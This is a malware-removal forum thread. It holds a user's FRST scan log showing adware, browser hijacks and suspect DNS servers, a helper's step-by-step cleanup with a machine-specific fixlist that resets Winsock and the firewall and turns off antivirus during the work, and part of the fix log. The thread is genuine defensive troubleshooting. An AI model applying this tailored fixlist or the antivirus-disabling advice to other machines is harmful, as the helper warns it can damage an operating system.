2016-03-07 10:34 - 2016-03-07 10:35 - 00938496 _____ () C:\Program Files\WindowsApps\Microsoft.BingSports_4.8.268.0_x86__8wekyb3d8bbwe\SQLite3Wrapper.dll
2013-06-07 05:16 - 2013-06-07 05:16 - 00019240 _____ () C:\Program Files (x86)\HP SimplePass\DownloadManager.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\Reprise:vnhwfkolvwxicefnplfh [0]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2016-03-01 13:44 - 00000084 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 localhost
0.0.0.1 mssplus.mcafee.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\levilaing\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\{9deef5e1-ccab-4b3d-bca1-455b50a6a967}.jpg
DNS Servers: 82.163.142.7 - 95.211.158.134
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run32: => "Price Finder"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeUpdater"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeWatcher"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "BCSSync"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "Power2GoExpress8"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "SearchProtection"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{B526A50D-0A4A-47AF-A3B1-18F21237DBCD}] => (Allow) C:\Users\levilaing\AppData\Local\Mozilla Firefox\firefox.exe
FirewallRules: [{258313C4-446C-4F80-A1C7-1AA672291888}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe
FirewallRules: [{6D362581-2BEE-4B50-A798-8C1C721EFBFB}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{51A806B9-9B7C-4275-9EA0-581A00033A72}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{9C21B4E7-5A56-4E6F-A346-D89A430563D3}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{C0AF4038-CF12-491F-8961-B9239EE741A0}] => (Allow) C:\Users\levilaing\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{789CBDE5-8D93-45AD-9D41-B2E85FAEF763}] => (Allow) C:\Users\levilaing\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{3911963A-E07B-411B-B094-BF32F1533B97}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{7F503151-B69D-404F-89E3-E44E2D72EAFE}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{8AF0A2D5-C73D-4CFE-B437-1776D167C64B}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{1CDAD930-81E3-4E65-940D-B569BCD30FFC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C3BE03B9-7BCE-4AAE-8021-97FE4B1BA2D1}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{6B8C3DDB-1C92-4AAE-9318-5E08D67AEBE7}C:\program files (x86)\hp\common\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hp\common\hpdevicedetection3.exe
FirewallRules: [UDP Query User{7493AB54-CF3E-43B9-8661-1A409ECB3FDC}C:\program files (x86)\hp\common\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hp\common\hpdevicedetection3.exe
FirewallRules: [TCP Query User{3A421C94-4882-4C5E-9ED8-6948A8F4423F}C:\users\levilaing\downloads\bittorrent.exe] => (Block) C:\users\levilaing\downloads\bittorrent.exe
FirewallRules: [UDP Query User{D30C2AD3-4E64-41E5-BA64-7B55FE47829D}C:\users\levilaing\downloads\bittorrent.exe] => (Block) C:\users\levilaing\downloads\bittorrent.exe
FirewallRules: [{BF72EB0A-F386-4B9B-856E-1E38298F4B42}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C0DE9C4E-50E0-49F5-A4A2-426F40D17394}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{721308D0-7918-4B76-8E8C-4C92E145C656}] => (Allow) LPort=2869
FirewallRules: [{6B0EBD56-A311-4A92-BFE3-518FD740BDCE}] => (Allow) LPort=1900
FirewallRules: [{64C1D218-9AD0-4580-AFC9-CABAF0C98A64}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

09-02-2016 13:53:15 Windows Update
01-03-2016 13:01:54 Windows Update
01-03-2016 13:02:55 Windows Update

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/04/2016 03:50:53 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1109

Error: (03/04/2016 03:50:53 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1109

Error: (03/04/2016 03:50:53 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/04/2016 03:29:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LEVISPC)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

System errors:
=============
Error: (03/08/2016 12:28:01 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/08/2016 11:24:19 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/08/2016 09:16:52 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/07/2016 06:12:22 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/07/2016 05:31:28 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/07/2016 04:27:37 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/07/2016 01:17:02 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/07/2016 10:45:07 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/04/2016 03:50:29 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/04/2016 12:24:52 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

CodeIntegrity:
===================================
Date: 2016-03-01 13:39:04.692
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-15 11:48:03.432
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-09 21:20:12.135
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-28 15:09:07.207
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-19 20:04:09.326
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-12 14:52:54.813
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-06 07:51:33.186
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-12-31 10:57:24.742
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-12-28 11:47:23.759
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-12-24 11:09:17.839
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core™ i5-3210M CPU @ 2.50GHz
Percentage of memory in use: 47%
Total physical RAM: 6033.27 MB
Available physical RAM: 3143.95 MB
Total Virtual: 6993.27 MB
Available Virtual: 3529.85 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:669.53 GB) (Free:596.48 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:27.14 GB) (Free:3.16 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 5CA0CBD1)

Partition: GPT.

==================== End of Addition.txt ============================

#5
pystryker

Posted 08 March 2016 - 08:53 PM

Trusted Helper

Malware Removal
3,912 posts

Hello

We have much to do, so let's get started. Please take your time following these instructions, as there's a lot to go through. :thumbsup:

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.

Step 1: P2P Warning and Program Uninstalls

The Dangers of P2P Programs

I noticed that you have a P2P file sharing program on your computer . I cannot stress highly enough the danger in using these types of programs. P2P programs are one of the major avenues of infection these days. The files downloaded with these programs are more likely than not infected with trojans, malware, rootkits, etc.

You run the risk of getting an infection that can compromise your sensitive data, such as financial records, personal information, etc. That is just the infection aspect of using P2P programs. You also run the risk of possible arrest, fines, or in severe cases, jail time for illegal downloading of copyrighted material.

There are also new infections out there such as CryptoWall 3.0 and CryptoLocker. When infected with these, all of your personal files on any drive connected to your computer will be affected. These infections copy all your files, encrypt them, and then delete the originals, leaving you with the encrypted copies. You are then presented with a screen telling you you have a certain amount of time to pay the ransom for the decryption code to decrypt your files. Even if you pay the ransom, there decryption process usually results in corrupt and unusable files.

There is nothing we can do to decrypt the files, as they use very sophisticated encryption techniques. Please consider this when using P2P programs. Malware and ransomware writers use P2P to spread their infections.

Here are some information sources about the dangers of P2P programs:

FBI - Peer to Peer Scams

USA Today Artticle on P2P Programs

File Sharing Infects 500,000 Computers

I very much recommend you uninstall this program from your machine. If not, I can guarantee you will be back needing help with your machine again. The risks of infections from content downloaded with P2P programs far outweigh any benefit of using them.

It is, of course, your choice as to whether or not you remove the program from your machine. It is my duty though, to point out how dangerous it is to use these programs. However, I must request that you do not use it while we are cleaning your machine.

Program Uninstalls

Please uninstall the following programs from your machine as they are adware/malware related. If one of the programs fails to uninstall, please move on to the next one in the list.

Desktop-play 000.015020180
PhraseProfessor
Setup

Step 2: Fix with FRST

Note: Before performing this step, please move FRST64.exe from C:\Users\levilaing\Downloads to the Desktop, or the fix will not work. All tools must be run from the Desktop.

Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this highlight the contents of the box, right click on it and select copy.
Right-click in the open notepad and select Paste).
Save it on the desktop as fixlist.txt

NOTE: It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

Start
CreateRestorePoint:
CloseProcesses:
() C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe
C:\Program Files\Phrase Professor191220150009
BHO: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy64.dll [2015-12-18] ()
BHO-x32: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy.dll [2015-12-18] ()
FF HKLM\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
FF Extension: Phrase Professor191220150009 - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi [2015-12-18] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
R2 OhufgaFyfves; C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe [178536 2015-12-18] ()
HKLM-x32\...\Run: [Price Finder] => C:\Program Files (x86)\Price Finder\PriceFinderHelper.exe [43088 2013-11-15] (MindSpark Interactive Network)
C:\Program Files (x86)\Price Finder
HKLM-x32\...\Run: [ShopAtHomeWatcher] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
HKLM-x32\...\Run: [ShopAtHomeUpdater] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe
C:\Users\levilaing\AppData\Roaming\ShopAtHome
HKLM-x32\...\Run: [] => [X]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://start.mysearchdial.com/?f=1&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM-x32 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=NS&chn=oem&geo=US&ver=22&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {cf34d395-9ff1-49a0-98a5-8db1636431b1} URL = hxxp://houmpage.com/search/?src=ds&q={searchTerms}&ssid=1450481507&a=1024151&uuid=7e89bdc6-7099-4da4-a7cc-3fa3a69a6cef
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - No File
FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
FF Plugin-x32: @CouponXplorer_5z.com/Plugin -> C:\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll [2013-11-15] (MindSpark)
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/thinkorswim -> C:\Program Files (x86)\thinkorswim\npthinkorswim.dll [No File]
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/tossc -> C:\Program Files (x86)\thinkorswim\nptossc.dll [No File]
FF user.js: detected! => C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\user.js [2015-12-18]
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch
CHR StartupUrls: Default -> "hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch"
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]
Task: {0233CBA7-CF8D-47C8-AAE0-15C5520BF73A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {37FDB4B4-6F58-489C-8711-7C16755A4F51} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {49AB09C4-19DF-4844-B998-467FA3B28176} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {52A76F52-D07F-4BA4-BBA5-AEFB8BDDE6A6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {8320D12B-9A3D-426A-BE5D-C9473998057E} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {8ED39B48-87B2-45B8-9B4A-7E3A4A3DEF49} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {926DF571-83F8-4B67-B099-E0CDE2A8E9B0} - \DNSKALAMAZOO -> No File <==== ATTENTION
Task: {96B45D1F-D133-4A3A-95CD-6BF63DBC0718} - System32\Tasks\Digital Sites => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {9D71B00E-3092-4BC0-8F6B-D6DA41E8DC2F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B0286D41-AF85-4532-AD16-2B5402FE5DE7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {DD03D11B-03BD-4AD8-A57F-49D7F5FBD8A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {F4362C16-5DD8-45CC-BFF8-0DE20551FD7B} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {FC1EC4B9-E68E-48D4-B596-73DA09BA7009} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\Digital Sites.job => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:vnhwfkolvwxicefnplfh [0]
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 05 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
CMD: netsh winsock reset catalog
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
End

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.

Step 3: Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.

Shut down your protection software now to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.

Step 4: AdwCleaner

Download ADWcleaner by clicking here. Please save it to your Desktop

Double click (Vista and 7 Users)right click the adwcleaner.exe file and click Run as Adminstrator and accept the UAC prompt to run AdwCleaner
Once AdwCleaner's control panel is open and it says "Waiting for Action", click on Options at the top of the control panel.
Please Check the following options:
- Reset Proxy Settings
- Reset Winsock Settings
- Reset TCP/IP Settings
- Reset Firewall Settings
- Reset IPSec Settings
- Reset BITS Queue
- Reset Internet Explorer Policies
- Reset Chrome Policies
Close any open windows or browsers.
Pause your Anti-Virus program if it is running.
Once it starts, click on the Scan button.
Let the scan complete itself. This may take a few minutes.
Once the scan has finished, it will say "Pending, uncheck elements you don't want to remove.", don't worry about unchecking anything and then click the Cleaning button. When finished, it will ask to reboot. Please reboot.
When the machine has rebooted, a log will be produced. Please copy/paste that in your next reply. Here's how:
- Click the Logfile button and the log will open. Copy and Paste the contents of the log file into your next reply.
This report is also saved at C:\Program Files

Step 5: Fresh FRST Scan

Start Farbar's Recovery Scan Tool and press the Scan button.
FRST will scan your system and produce two logs: FRST.txt and Addition.txt. Please post them in your next reply.

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log

Junkware Removal Tool Log

AdwCleaner Log

Fresh FRST.txt Log

Fresh Addition.txt Log

#6
LLL31

Posted 09 March 2016 - 05:21 PM

Member

Topic Starter
Member
15 posts

I have completed the initial fix but am unable to download the two programs. Every time I click on the links to the downloads my computer grinds to a halt and numerous ads pop up and firefox is (not responding).. Here is the fix log. I also deleted PraseProfessor and Desktop play.

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by levilaing (2016-03-09 16:45:13) Run:1
Running from C:\Users\levilaing\Desktop
Loaded Profiles: levilaing (Available Profiles: levilaing)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
() C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe
C:\Program Files\Phrase Professor191220150009
BHO: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy64.dll [2015-12-18] ()
BHO-x32: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy.dll [2015-12-18] ()
FF HKLM\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
FF Extension: Phrase Professor191220150009 - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi [2015-12-18] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
R2 OhufgaFyfves; C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe [178536 2015-12-18] ()
HKLM-x32\...\Run: [Price Finder] => C:\Program Files (x86)\Price Finder\PriceFinderHelper.exe [43088 2013-11-15] (MindSpark Interactive Network)
C:\Program Files (x86)\Price Finder
HKLM-x32\...\Run: [ShopAtHomeWatcher] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
HKLM-x32\...\Run: [ShopAtHomeUpdater] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe
C:\Users\levilaing\AppData\Roaming\ShopAtHome
HKLM-x32\...\Run: [] => [X]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://start.mysearchdial.com/?f=1&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
